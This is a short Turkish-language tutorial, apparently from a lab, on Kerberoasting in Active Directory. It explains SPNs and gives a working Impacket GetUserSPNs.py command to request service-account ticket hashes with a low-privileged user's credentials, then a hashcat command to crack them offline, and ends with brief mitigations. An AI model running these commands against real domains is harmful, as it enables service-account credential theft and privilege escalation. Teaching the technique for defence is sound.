Kerberosting

Kerberoasting saldırısı yapabilmek için domainde kayıtlı bir kullanıcının hesap bilgilere sahip olmamız gerekmektedir. Kerberoasting, servis hesaplarını ele geçirmek için yapılan bir saldırıdır. Kerberoasting, servis hesaplarına erişim erişme, hedef sistemde hak ve yetki yükseltme ve hedef sistemde kalıcılık sağlama amacıyla kullanılabilir. Bu kısımda ilgilendiğimiz özellik aslında SPN olacaktır. Peki SPN nedir? Windows, servisleri ayırt etmek için SPNs (Service Principal Names) kullanmaktadır. SPN formatı : serviceclass/host:port şeklindedir.

python3 GetUserSPNs.py -request -dc-ip 192.168.158.139 FORMULA1.local/atatar:Password1 -outputfile kerberoasting.hash

Buradaki atatar kullanıcısı sistemde yetkisiz bir kullanıcıdır.

Daha sonrasın da bu hashi hashcat kullanarak kırabiliriz.

hashcat -m 13100 kerberoasting.hash pass.txt -o cracked.sql.service.account --force

Mitigation:

Uzun ve kelime listesinde olmayan parolalar oluşturun.

Servis hesapları domain admin olmasın.

Last updated